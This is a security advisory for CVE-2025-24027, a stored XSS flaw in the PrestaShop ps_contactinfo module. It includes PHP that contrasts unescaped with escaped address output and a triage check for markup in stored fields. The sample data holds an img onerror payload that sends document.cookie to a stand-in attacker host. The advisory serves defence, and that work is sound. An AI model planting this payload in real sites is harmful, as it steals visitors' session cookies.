PT-2025-5267 · Prestashop · Ps Contactinfo

Matthieu-Rolland

·

Published

2025-01-22

·

Updated

2025-01-23

·

CVE-2025-24027

CVSS v3.1

6.2

Medium

Vector

AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:H
Name of the Vulnerable Software and Affected Versions

PrestaShop module ps_contactinfo, versions up to and including 3.3.2

Description

The ps_contactinfo module contains a stored cross-site scripting (XSS) vulnerability: address data read from the database is rendered into the formatted shop address without being escaped. The issue is exploitable only in shops that have already been made vulnerable by a third-party module, for example one with an SQL injection flaw. If such a flaw lets an attacker store HTML or JavaScript in the address fields, ps_contactinfo will execute that payload in the browser of anyone to whom it displays the formatted address. A commit has been made so that formatted addresses no longer render a stored XSS payload from the database; the fix is expected to be available in version 3.3.3.

Recommendations

For versions up to and including 3.3.2, upgrade to 3.3.3 once it is available, or apply the fix commit. There is no other workaround: keeping every installed module maintained and up to date only reduces the chance that an unrelated flaw, such as an SQL injection, can plant the payload in the first place. For version 3.3.3 and later no action is required, as the fix is expected to be included in that version.
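To make the failure mode concrete, the following PHP is an added illustration for this advisory; it is not code from ps_contactinfo, PrestaShop, or the fix commit. It builds a formatted address from stored fields and emits it as HTML twice: once in the unescaped form the advisory describes, and once in a hardened form that escapes each field before the `<br>` markup is inserted. A small triage check for stored values that already contain markup is included. The function names, the layout array and the tampered sample row are all assumptions constructed for the example.

```php
<?php
// Added illustration for this advisory (not code from ps_contactinfo or PrestaShop).
// It reproduces the pattern the advisory describes: address fields read from the
// database are joined into a formatted address and emitted as HTML. All function
// names, the layout array and the sample data below are assumptions made here.

declare(strict_types=1);

// Constructed sample: shop address values as a third-party module's SQL injection
// could have left them in the database. "address2" carries the stored XSS payload.
const TAMPERED_ADDRESS = [
    'company'  => 'Example Shop',
    'address1' => '1 Example Street',
    'address2' => '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">',
    'postcode' => '12345',
    'city'     => 'Springfield',
];

// Assumed address layout: one output line per entry, field names separated by
// spaces; lines are later separated by <br> in the HTML output.
const ADDRESS_LAYOUT = ['company', 'address1', 'address2', 'postcode city'];

/**
 * Vulnerable pattern: raw database values are interpolated into the layout and
 * the result is handed to the page unescaped (the "nofilter" style of output).
 */
function formatAddressUnsafe(array $address, array $layout): string
{
    $lines = [];
    foreach ($layout as $line) {
        $lines[] = implode(' ', array_map(
            static fn(string $field): string => $address[$field] ?? '',
            explode(' ', $line)
        ));
    }
    return implode('<br>', array_filter($lines, static fn(string $l): bool => trim($l) !== ''));
}

/**
 * Hardened pattern: every field is HTML-escaped *before* the trusted <br> markup
 * is added, so line breaks survive while stored tags and attributes are neutralised.
 */
function formatAddressSafe(array $address, array $layout): string
{
    $lines = [];
    foreach ($layout as $line) {
        $lines[] = implode(' ', array_map(
            static fn(string $field): string => htmlspecialchars(
                $address[$field] ?? '',
                ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5,
                'UTF-8'
            ),
            explode(' ', $line)
        ));
    }
    return implode('<br>', array_filter($lines, static fn(string $l): bool => trim($l) !== ''));
}

/**
 * Triage helper for a shop still on <= 3.3.2: flag stored address values that
 * contain markup or script-like content, which legitimate address data never needs.
 */
function findSuspiciousAddressFields(array $address): array
{
    $hits = [];
    foreach ($address as $field => $value) {
        if (preg_match('/<|javascript:|on\w+\s*=/i', (string) $value)) {
            $hits[] = $field;
        }
    }
    return $hits;
}

echo "Unsafe: ", formatAddressUnsafe(TAMPERED_ADDRESS, ADDRESS_LAYOUT), "\n";
echo "Safe:   ", formatAddressSafe(TAMPERED_ADDRESS, ADDRESS_LAYOUT), "\n";
echo "Suspicious fields: ", implode(', ', findSuspiciousAddressFields(TAMPERED_ADDRESS)), "\n";
```

Run it with `php example.php`: the unsafe line reproduces the `<img ... onerror=...>` payload verbatim in the generated HTML, the safe line shows it neutralised to `&lt;img ...&gt;`, and the triage line names `address2`. The design point is ordering: escaping must be applied to the individual field values before trusted markup such as `<br>` is inserted. Escaping the finished string instead destroys the line breaks, and emitting it with escaping disabled is exactly the exposure this advisory describes.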

Exploit

Fix

XSS


Weakness Enumeration

Related Identifiers

CVE-2025-24027
GHSA-35PQ-7PV2-2RFW

Affected Products

Ps Contactinfo